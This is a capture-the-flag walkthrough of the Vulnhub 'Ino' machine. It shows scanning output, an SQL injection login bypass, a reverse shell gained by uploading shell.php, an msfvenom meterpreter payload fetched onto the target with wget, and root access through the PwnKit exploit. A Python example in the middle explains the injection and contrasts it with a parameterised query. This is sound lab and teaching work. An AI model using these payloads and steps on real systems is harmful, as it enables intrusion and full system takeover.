Ino
Identifying the target host's IP address

```
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor
 192.168.56.100  08:00:27:86:38:75      1      60  PCS Systemtechnik GmbH
 192.168.56.253  08:00:27:f5:7e:8f      1      60  PCS Systemtechnik GmbH
```

Kali Linux's netdiscover tool identifies the target host's IP address as 192.168.56.253.
Nmap scan

```
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.253 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-16 00:34 EDT
Nmap scan report for localhost (192.168.56.253)
Host is up (0.00034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 deb52389bb9fd41ab50453d0b75cb03f (RSA)
|   256 160914eab9fa17e945395e3bb4fd110a (ECDSA)
|_  256 9f665e71b9125ded705a4f5a8d0d65d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:F5:7E:8F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.84 seconds
```

The Nmap results show that the target has two open ports: 22 (SSH) and 80 (HTTP).
Getting a shell

Visiting port 80, the returned page shows that the CMS is Lot Reservation Management System.

```
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ searchsploit Lot Reservation
-------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                 |  Path
-------------------------------------------------------------------------------- ---------------------------------
Lot Reservation Management System 1.0 - Authentication Bypass                  | php/webapps/48934.txt
Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)          | php/webapps/48935.txt
-------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
The version is not yet known, so first check whether there are other directories worth looking at.

```
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ nikto -h http://192.168.56.253
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.253
+ Target Hostname:    192.168.56.253
+ Target Port:        80
+ Start Time:         2023-04-16 00:40:09 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: /lot/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ Scan terminated:  20 error(s) and 3 item(s) reported on remote host
+ End Time:           2023-04-16 00:41:00 (GMT-4) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
```

Requests to the root are automatically redirected to the /lot directory.
Gobuster was unable to enumerate directories:

```
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.253/lot/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.253/lot/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,js,sh,txt
[+] Timeout:                 10s
===============================================================
2023/04/16 00:46:35 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://192.168.56.253/lot/: Get "http://192.168.56.253/lot/": dial tcp 192.168.56.253:80: connect: connection refused
```
```
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ searchsploit -m php/webapps/48934.txt
  Exploit: Lot Reservation Management System 1.0 - Authentication Bypass
      URL: https://www.exploit-db.com/exploits/48934
     Path: /usr/share/exploitdb/exploits/php/webapps/48934.txt
    Codes: N/A
 Verified: True
File Type: ASCII text
Copied to: /home/kali/Vulnhub/Ino/48934.txt

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ cat 48934.txt
#Exploit Title: lot reservation management system 1.0 - Authentication Bypass
#Date: 2020-10-22
#Exploit Author: Ankita Pal
#Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip
#Version: V1.0
#Tested on: Windows 10 + xampp v3.2.4

Proof of Concept:::
Step 1: Open the URL http://localhost:8081/lot-reservation-management-system/admin/login.php
Step 2: use payload ' or 1=1 limit 1 -- -+ for both username and password.

Malicious Request:::
POST /lot-reservation-management-system/admin/ajax.php?action=login HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 71
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/lot-reservation-management-system/admin/login.php
Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id

username='+or+1%3D1+limit+1+--+-%2B&password='+or+1%3D1+limit+1+--+-%2B

You will be login as admin of the application.
```
Using the bypass string at http://192.168.56.253/lot/admin/ with

Username field: admin' or 1=1 --
Password field: admin' or 1=1 --

the admin back end can be bypassed.
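To see why the strings above log you in, it helps to look at the query shape rather than the CMS. The following is an added example (not code from this post or from Lot Reservation Management System): it models the admin login against an in-memory sqlite3 table, once with the query built by string concatenation and once with bound parameters. The table layout and the admin credentials are constructed for the demo; the real application is PHP with MySQLi, so this is a model of the bug class, not the project's code.

```python
"""Added example: string-built login query versus parameterised query.

Not from the original post or from the CMS it targets. The users table and
the admin credentials are constructed for this demo; sqlite3 stands in for
the application's MySQL back end (an assumption made for portability).
"""
import sqlite3

# Constructed demo account (not data from the target machine).
ADMIN_USER = "admin"
ADMIN_PASS = "S3cret!pass"


def make_db() -> sqlite3.Connection:
    """In-memory database holding a single admin row."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        (ADMIN_USER, ADMIN_PASS),
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Query assembled from the raw form fields: the input becomes SQL syntax.

    With username "admin' or 1=1 --" the closing quote ends the literal,
    "or 1=1" makes the WHERE clause true for every row, and "--" comments
    out the password comparison, so any row satisfies the query.
    """
    sql = (
        "SELECT id FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same lookup with bound parameters: the input is compared as data only."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or 1=1 --"
    print("real creds, vulnerable:", login_vulnerable(db, ADMIN_USER, ADMIN_PASS))
    print("payload,    vulnerable:", login_vulnerable(db, payload, payload))
    print("payload,    safe      :", login_safe(db, payload, payload))
```

The parameterised version is not a filter on "bad characters": the payload is stored and compared verbatim and simply matches no username. One detail that differs between engines: sqlite3 treats `--` as a comment wherever it appears, while MySQL requires whitespace after `--`, which is why the Exploit-DB payload ends in `-- -+` rather than a bare `--`.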
In System Settings, a shell.php file can be uploaded, which gives a reverse shell from the target back to Kali Linux:

```
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.253] 40798
Linux ino 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64 GNU/Linux
 05:59:36 up 26 min,  0 users,  load average: 0.00, 0.21, 0.60
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ino:/$ cd /home
cd /home
www-data@ino:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root root 4.0K Oct 10  2020 .
drwxr-xr-x 18 root root 4.0K Oct 27  2020 ..
drwxr-xr-x  2 ppp  ppp  4.0K Dec  5  2020 ppp
www-data@ino:/home$ cd ppp
cd ppp
www-data@ino:/home/ppp$ ls -alh
ls -alh
total 24K
drwxr-xr-x 2 ppp  ppp  4.0K Dec  5  2020 .
drwxr-xr-x 3 root root 4.0K Oct 10  2020 ..
lrwxrwxrwx 1 root root    9 Dec  5  2020 .bash_history -> /dev/null
-rw-r--r-- 1 ppp  ppp   220 Oct 10  2020 .bash_logout
-rw-r--r-- 1 ppp  ppp  3.5K Oct 10  2020 .bashrc
-rw-r--r-- 1 ppp  ppp   807 Oct 10  2020 .profile
-rw-r--r-- 1 ppp  ppp    33 Dec  5  2020 local.txt
www-data@ino:/home/ppp$ cat local.txt
cat local.txt
f29cea45f473ebfa834885c4ff70ec1a
```

This gives the user flag.
Privilege escalation

```
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.206 LPORT=6666 -f elf -o escalate.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: escalate.elf

┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

Generate the payload with msfvenom, then upload escalate.elf to the target's /tmp directory:

```
www-data@ino:/tmp$ wget http://192.168.56.206:8000/escalate.elf
wget http://192.168.56.206:8000/escalate.elf
--2023-04-16 06:06:32--  http://192.168.56.206:8000/escalate.elf
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: 'escalate.elf'

escalate.elf        100%[===================>]     207  --.-KB/s    in 0s

2023-04-16 06:06:32 (65.6 MB/s) - 'escalate.elf' saved [207/207]

www-data@ino:/tmp$ chmod +x escalate.elf
chmod +x escalate.elf
```
Start the handler on Kali Linux:

```
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run
```

Run ./escalate.elf in the target's shell.
This yields a meterpreter session:

```
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.206:6666
[*] Sending stage (1017704 bytes) to 192.168.56.253
[*] Meterpreter session 1 opened (192.168.56.206:6666 -> 192.168.56.253:44636) at 2023-04-16 01:07:39 -0400

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester
```
Use local_exploit_suggester to find exploit modules for privilege escalation:

```
[*] 192.168.56.253 - Valid modules for session 1:
============================

 #   Name                                                 Potentially Vulnerable?  Check Result
 -   ----                                                 -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec  Yes                      The target is vulnerable.
 2   exploit/linux/local/pkexec                           Yes                      The service is running, but could not be validated.
 3   exploit/linux/local/su_login                         Yes                      The target appears to be vulnerable.
```
Use the first module to escalate privileges:

```
meterpreter > shell
Process 1409 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -alh
total 28K
drwx------  3 root root 4.0K Dec  5  2020 .
drwxr-xr-x 18 root root 4.0K Oct 27  2020 ..
lrwxrwxrwx  1 root root    9 Dec  5  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-------  1 root root 3.5K Oct 26  2020 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K Oct 27  2020 .ssh
-rw-------  1 root root   33 Dec  5  2020 proof.txt
cat proof.txt
21bae0a12690199cde7a65bff57723a5
```

This gives a root shell and the root flag.